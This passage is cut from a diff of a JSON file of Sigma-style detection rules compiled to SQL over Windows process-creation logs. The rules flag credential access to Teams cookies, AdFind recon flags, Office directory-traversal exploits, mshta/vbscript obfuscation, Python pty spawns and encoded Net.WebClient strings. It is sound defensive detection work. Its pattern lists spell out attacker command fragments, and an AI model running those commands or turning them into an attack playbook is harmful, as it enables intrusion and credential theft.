"@SerkinValery", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\System32\\\\control.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE')) AND NOT (CommandLine LIKE '%Shell32.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_susp_control_dll_load.yml" + "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml" }, { - "title": "PUA - AdFind Suspicious Execution", - "id": "9a132afa-654e-11eb-ae93-0242ac130002", - "status": "test", - "description": "Detects AdFind execution with common flags seen used during attacks", - "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", + "title": "Potential Recon Activity Using DriverQuery.EXE", + "id": "9fc3072c-dc8f-4bf7-b231-18950000fadd", + "status": "experimental", + "description": "Detect usage of the \"driverquery\" utility to perform reconnaissance on installed drivers", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1018", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.002" + "attack.discovery" ], "falsepositives": [ - "Legitimate admin activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE 
'%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_pua_adfind_susp_usage.yml" - }, - { - "title": "Microsoft Workflow Compiler Execution", - "id": "419dbf2b-8a9b-4bea-bf99-7544b050ec8d", - "status": "test", - "description": "Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.", - "author": "Nik Seetharaman, frack113", - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1127", - "attack.t1218" - ], - "falsepositives": [ - "Legitimate MWC use (unlikely in modern enterprise environments)" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR OriginalFileName = 'Microsoft.Workflow.Compiler.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE 
'\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_workflow_compiler.yml" + "filename": "proc_creation_win_driverquery_recon.yml" }, { - "title": "Potential System Information Discovery Via Wmic.EXE", - "id": "9d5a1274-922a-49d0-87f3-8c653483b909", + "title": "Potential Exploitation Attempt From Office Application", + "id": "868955d9-697e-45d4-a3da-360cefd7c216", "status": "experimental", - "description": "Detects the use of the WMI command-line (WMIC) utility to identify and display various system information,\nincluding OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS,\nand GPU driver products/versions.\nSome of these commands were used by Aurora Stealer in late 2022/early 2023.\n", - "author": "TropChaud", + "description": "Detects Office applications executing a child process that includes directory traversal patterns. 
This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)", + "author": "Christian Burkard (Nextron Systems), @SBousseaden (idea)", "tags": [ - "attack.discovery", - "attack.t1082" + "attack.execution", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'WMI Commandline Utility' OR OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '%cpu get name%' ESCAPE '\\' OR CommandLine LIKE '%MEMPHYSICAL get MaxCapacity%' ESCAPE '\\' OR CommandLine LIKE '%baseboard get product%' ESCAPE '\\' OR CommandLine LIKE '%baseboard get version%' ESCAPE '\\' OR CommandLine LIKE '%bios get SMBIOSBIOSVersion%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get name%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get DriverVersion%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get VideoModeDescription%' ESCAPE '\\' OR CommandLine LIKE '%OS get Caption,OSArchitecture,Version%' ESCAPE '\\' OR CommandLine LIKE '%DISKDRIVE get Caption%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\visio.exe' ESCAPE '\\') AND (CommandLine LIKE '%../../../..%' ESCAPE '\\' OR CommandLine LIKE '%..\\\\..\\\\..\\\\..%' ESCAPE '\\' OR CommandLine LIKE '%..//..//..//..%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_recon_system_info_discovery.yml" + "filename": 
"proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml" }, { - "title": "Winrar Execution in Non-Standard Folder", - "id": "4ede543c-e098-43d9-a28f-dd784a13132f", - "status": "test", - "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", - "author": "Florian Roth (Nextron Systems), Tigzy", + "title": "Powershell ChromeLoader Browser Hijacker", + "id": "27ba3207-dd30-4812-abbf-5d20c57d474e", + "status": "experimental", + "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'", + "author": "Aedan Russell, frack113 (sigma)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.persistence", + "attack.t1176" ], "falsepositives": [ - "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND NOT ((NewProcessName LIKE '%\\\\WinRAR%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\UnRAR.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%--load-extension=%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_winrar_execution.yml" + "filename": "proc_creation_win_browsers_chrome_load_extension.yml" }, { - "title": "Python Spawning Pretty TTY on Windows", - "id": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", + "title": "Suspicious Active 
Directory Database Snapshot Via ADExplorer", + "id": "ef61af62-bc74-4f58-b49b-626448227652", "status": "experimental", - "description": "Detects python spawning a pretty tty", - "author": "Nextron Systems", + "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database to a suspicious directory.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.credential_access", + "attack.t1552.001", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%python.exe' ESCAPE '\\' OR NewProcessName LIKE '%python3.exe' ESCAPE '\\' OR NewProcessName LIKE '%python2.exe' ESCAPE '\\') AND ((CommandLine LIKE '%import pty%' ESCAPE '\\' AND CommandLine LIKE '%.spawn(%' ESCAPE '\\') OR CommandLine LIKE '%from pty import spawn%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_python_pty_spawn.yml" + "filename": "proc_creation_win_sysinternals_adexplorer_susp_execution.yml" }, { - "title": "Finger.exe Suspicious Invocation", - "id": "af491bca-e752-4b44-9c86-df5680533dbc", + "title": "PUA - Advanced IP Scanner Execution", + "id": "bef37fa2-f205-4a7b-b484-0759bfd5f86f", "status": "experimental", - "description": "Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays", - "author": "Florian Roth (Nextron Systems), omkar72, oscd.community", + 
"description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", + "author": "Nasreddine Bencherchali (Nextron Systems), @ROxPinTeddy", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.discovery", + "attack.t1046", + "attack.t1135" ], "falsepositives": [ - "Admin activity (unclear what they do nowadays with finger.exe)" + "Legitimate administrative use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'finger.exe' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\advanced\\_ip\\_scanner%' ESCAPE '\\' OR OriginalFileName LIKE '%advanced\\_ip\\_scanner%' ESCAPE '\\' OR Description LIKE '%Advanced IP Scanner%' ESCAPE '\\') OR (CommandLine LIKE '%/portable%' ESCAPE '\\' AND CommandLine LIKE '%/lng%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_finger_usage.yml" + "filename": "proc_creation_win_pua_advanced_ip_scanner.yml" }, { - "title": "Detected Windows Software Discovery", - "id": "e13f668e-7f95-443d-98d2-1816a7648a7b", + "title": "SQL Client Tools PowerShell Session Detection", + "id": "a746c9b8-a2fb-4ee5-a428-92bee9e99060", "status": "test", - "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", - "author": "Nikita Nazarov, oscd.community", + "description": "This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", + "author": "Agro (@agro_sev) 
oscd.communitly", "tags": [ - "attack.discovery", - "attack.t1518" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Legitimate administration activities" + "Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%query%' ESCAPE '\\' AND CommandLine LIKE '%\\\\software\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%svcversion%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sqltoolsps.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqltoolsps.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\sqltoolsps.exe' ESCAPE '\\') AND NOT (ParentProcessName LIKE '%\\\\smss.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_software_discovery.yml" + "filename": "proc_creation_win_mssql_sqltoolsps_susp_execution.yml" }, { - "title": "Arbitrary Binary Execution Using GUP Utility", - "id": "d65aee4d-2292-4cea-b832-83accd6cfa43", + "title": "Use of VSIISExeLauncher.exe", + "id": "18749301-f1c5-4efc-a4c3-276ff1f5b6f8", "status": "experimental", - "description": "Detects execution of the Notepad++ updater (gup) to launch other commands or executables", + "description": "The \"VSIISExeLauncher.exe\" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Other parent binaries using GUP not currently identified" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\gup.exe' ESCAPE 
'\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Notepad++\\\\notepad++.exe%' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\Notepad++\\\\updater\\\\%' ESCAPE '\\') OR (CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\VSIISExeLauncher.exe' ESCAPE '\\' OR OriginalFileName = 'VSIISExeLauncher.exe') AND (CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_gup_arbitrary_binary_execution.yml" + "filename": "proc_creation_win_lolbin_vsiisexelauncher.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA", - "id": "ac20ae82-8758-4f38-958e-b44a3140ca88", - "status": "test", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], + "title": "Suspicious Windows Update Agent Empty Cmdline", + "id": "52d097e2-063e-4c9c-8fbb-855c8948d135", + "status": "experimental", + "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%mshta%' ESCAPE '\\' AND CommandLine LIKE '%vbscript:createobject%' ESCAPE '\\' AND CommandLine LIKE '%.run%' ESCAPE '\\' AND CommandLine LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'Wuauclt.exe') AND CommandLine LIKE '%\\\\Wuauclt.exe' ESCAPE 
'\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml" + "filename": "proc_creation_win_wuauclt_no_cli_flags_execution.yml" }, { - "title": "SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code", - "id": "36475a7d-0f6d-4dce-9b01-6aeb473bbaf1", + "title": "Potential Suspicious Mofcomp Execution", + "id": "1dd05363-104e-4b4a-b963-196a534b03a1", "status": "experimental", - "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs", - "author": "frack113", + "description": "Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or script running utility or by having a supsicious path in the commandline.\nThe \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.\nAttackers abuse this utility to install malicious MOF scripts\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.t1216" + "attack.execution", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\SyncAppvPublishingServer.vbs%' ESCAPE '\\' AND CommandLine LIKE '%;%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\mofcomp.exe' ESCAPE '\\' OR OriginalFileName = 'mofcomp.exe') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine 
LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\'))) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.mof' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.mof' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml" + "filename": "proc_creation_win_mofcomp_execution.yml" }, { - "title": "Sysinternals PsService Execution", - "id": "3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f", - "status": "experimental", - "description": "Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Malicious PE Execution by Microsoft Visual Studio Debugger", + "id": "15c7904e-6ad1-4a45-9b46-5fb25df37fd2", + "status": "test", + "description": "There is an option for a MS VS Just-In-Time Debugger \"vsjitdebugger.exe\" to launch specified executable and attach a debugger.\nThis option may be used adversaries to execute malicious code by signed verified binary.\nThe debugger is installed alongside with Microsoft Visual Studio package.\n", + "author": "Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community", "tags": [ - "attack.discovery", - "attack.persistence", - "attack.t1543.003" + "attack.t1218", + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate use of PsService by an administrator" + "The process spawned by vsjitdebugger.exe is uncommon." 
], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'psservice.exe' OR (NewProcessName LIKE '%\\\\PsService.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsService64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\vsjitdebugger.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\vsimmersiveactivatehelper%.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\devenv.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_psservice.yml" + "filename": "proc_creation_win_susp_use_of_vsjitdebugger_bin.yml" }, { - "title": "Defrag Deactivation", - "id": "958d81aa-8566-4cea-a565-59ccd4df27b0", + "title": "Audio Capture via SoundRecorder", + "id": "83865853-59aa-449e-9600-74b9d89a6d6e", "status": "test", - "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", - "author": "Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)", + "description": "Detect attacker collecting audio via SoundRecorder application.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.persistence", - "attack.t1053.005", - "attack.s0111" + "attack.collection", + "attack.t1123" ], "falsepositives": [ - "Unknown" + "Legitimate audio capture by legitimate user." 
], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '%/delete%' ESCAPE '\\' OR CommandLine LIKE '%/change%' ESCAPE '\\') AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Defrag\\\\ScheduledDefrag%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\SoundRecorder.exe' ESCAPE '\\' AND CommandLine LIKE '%/FILE%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_slingshot.yml" + "filename": "proc_creation_win_soundrecorder_audio_capture.yml" }, { - "title": "Microsoft IIS Connection Strings Decryption", - "id": "97dbf6e2-e436-44d8-abee-4261b24d3e41", - "status": "experimental", - "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", - "author": "Tim Rauch", + "title": "Imports Registry Key From a File", + "id": "73bba97f-a82d-42ce-b315-9182e76c57b1", + "status": "test", + "description": "Detects the import of the specified file to the registry with regedit.exe.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.t1112", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate import of keys", + "Evernote" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\aspnet\\_regiis.exe' ESCAPE '\\' OR OriginalFileName LIKE 'aspnet\\_regiis.exe' ESCAPE '\\') AND (CommandLine LIKE '%connectionStrings%' ESCAPE '\\' AND CommandLine LIKE '% -pdf%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel 
= 'Security') AND ((NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '% /s %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')) AND (CommandLine REGEXP ':[^ \\\\]')))" ], - "filename": "proc_creation_win_iis_connection_strings_decryption.yml" + "filename": "proc_creation_win_regedit_import_keys.yml" }, { - "title": "APT31 Judgement Panda Activity", - "id": "03e2746e-2b31-42f1-ab7a-eb39365b2422", - "status": "test", - "description": "Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report", + "title": "Potential CVE-2022-26809 Exploitation Attempt", + "id": "a7cd7306-df8b-4398-b711-6f3e4935cf16", + "status": "experimental", + "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.credential_access", - "attack.g0128", - "attack.t1003.001", - "attack.t1560.001" + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown", + "Some cases in which the service spawned a werfault.exe process" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%ldifde%' ESCAPE '\\' AND CommandLine LIKE '%-f -n%' ESCAPE '\\' AND CommandLine LIKE '%eprod.ldf%' ESCAPE '\\') OR (CommandLine LIKE '%copy \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%c$%' ESCAPE '\\' AND (CommandLine LIKE 
'%\\\\aaaa\\\\procdump64.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\aaaa\\\\netsess.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\aaaa\\\\7za.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\aaaa\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k RPCSS%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_apt31_judgement_panda.yml" + "filename": "proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml" }, { - "title": "CMSTP Execution Process Creation", - "id": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "Net WebClient Casing Anomalies", + "id": "c86133ad-4725-4bd0-8170-210788e0a7ba", + "status": "experimental", + "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. 
nEt.WEbCliEnT) string as used in obfuscation techniques", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.t1059.001" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%TgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBiA%' 